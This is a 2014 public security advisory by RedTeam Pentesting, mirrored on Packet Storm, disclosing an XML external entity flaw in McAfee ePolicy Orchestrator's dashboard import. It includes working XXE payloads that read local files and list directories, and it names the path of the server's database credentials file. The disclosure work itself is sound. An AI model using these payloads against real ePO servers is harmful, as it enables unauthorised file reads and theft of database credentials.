seeing is believing

McAfee ePolicy Orchestrator XML External Entity Expansion

McAfee ePolicy Orchestrator XML External Entity Expansion
Posted Feb 25, 2014
Site redteam-pentesting.de

RedTeam Pentesting identified an XML external entity expansion vulnerability in McAfee ePolicy Orchestrator's (ePO) dashboard feature. Users with the ability to create new dashboards in the ePO web interface who exploit this vulnerability can read local files on the ePO server, including sensitive data like the ePO database configuration. Versions 4.6.7 and below are affected.

tags | exploit, web, local
MD5 | 724d2b023c9019167f3cd08127c26878

McAfee ePolicy Orchestrator XML External Entity Expansion

Change Mirror Download
Advisory: McAfee ePolicy Orchestrator XML External Entity Expansion in
Dashboard

RedTeam Pentesting identified an XML external entity expansion
vulnerability in McAfee ePolicy Orchestrator's (ePO) dashboard feature.
Users with the ability to create new dashboards in the ePO web interface
who exploit this vulnerability can read local files on the ePO server,
including sensitive data like the ePO database configuration.


Details
=======

Product: McAfee ePolicy Orchestrator
Affected Versions: 4.6.7 and below
Fixed Versions: 4.6.7 + hotfix 940148
Vulnerability Type: XML External Entity Expansion
Security Risk: high
Vendor URL: http://www.mcafee.com/uk/products/epolicy-orchestrator.aspx
Vendor Status: hotfix released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-001
Advisory Status: public
CVE: GENERIC-MAP-NOMATCH
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
============

McAfee ePO allows to centrally manage other systems, including deploying
new software and collecting system information. Dashboards allow
privileged users to view statistics and current data about ePO and
associated systems.


More Details
============

Users with access to McAfee ePO's web interface can have the permission
to add new dashboards. Dashboard definitions can be exported as XML data
and also be imported again. A basic XML dashboard definition looks like
follows:

<dashboard id="1">
<name>RedTeam Pentesting</name>
<filteringEnabled>false</filteringEnabled>
</dashboard>

Importing a dashboard consists of uploading the XML data and confirming
the import afterwards. On the confirmation page the dashboard's name
defined in the XML tag "name" is shown.

The ePO system allows to add a user-defined DTD to the XML data and
therefore add additional entities, which will be expanded by the system.
The following example results in an dashboard with the name "RedTeam
Pentesting Entity":

<?xml version="1.0"?>
<!DOCTYPE dashboard [
<!ENTITY redteam "RedTeam Pentesting Entity">
]>
<dashboard id="1">
<name>&redteam;</name>
<filteringEnabled>false</filteringEnabled>
</dashboard>

It is also possible to specify external entities that for example point
to local files on the ePO server. The entity will then be expanded to
contain the file's content. This works as long as the file contents do
not make the resulting XML data invalid. Data that cannot be read
includes for example binary data or files containing XML data
themselves.

If the entity is used in the dashboard's name, the confirmation page
shown when importing a dashboard displays the contents of the file.

The following example XML data can be uploaded to read the file
C:\boot.ini:

<?xml version="1.0"?>
<!DOCTYPE dashboard [
<!ENTITY redteam SYSTEM "file:///c:/boot.ini">
]>
<dashboard id="1">
<name>&redteam;</name>
<filteringEnabled>false</filteringEnabled>
</dashboard>

It is also possible to get directory listings by using a file URL that
points to a directory, for example the C: drive:

<!ENTITY redteam SYSTEM "file:///c:/">


Workaround
==========

RedTeam Pentesting is not aware of any workarounds.


Fix
===

McAfee has issued a hotfix[0] for version 4.6.7 that removes the
vulnerability. An upgrade to the newer 5.x branch of the product will
also resolve this problem.


Security Risk
=============

The vulnerability is mitigated by the fact that users already need valid
login credentials for the ePO system and the permission to create
dashboards for a successful exploitation.

It is still considered to be of a high risk potential however, as it
gives attackers the opportunity to read potentially sensitive file
contents on the server. This includes for example ePO's database
credentials, which are typically stored in a file available at a path
like the following:

C:\programs\mcafee\epolicy orchestrator\server\conf\orion\db.properties

The credentials in this file are encrypted with a static key that is
publicly known and included for example in Metasploit[1].

Depending on the actual network structure, it might be possible to use
the decrypted credentials to read and alter the information in the ePO
database. This might lead to a compromise of the clients that are
managed by ePO.


Timeline
========

2013-11-20 Vulnerability identified
2013-11-22 Customer decided to coordinate disclosure with vendor
2014-02-14 Vendor replied to customer
2014-02-24 Vendor released hotfix for version 4.6.7 and a public
Security Bulletin[0]
2014-02-25 Advisory released


References
==========

[0] https://kc.mcafee.com/corporate/index?page=content&id=SB10065
[1] https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/epo_sql.rb


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.

--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close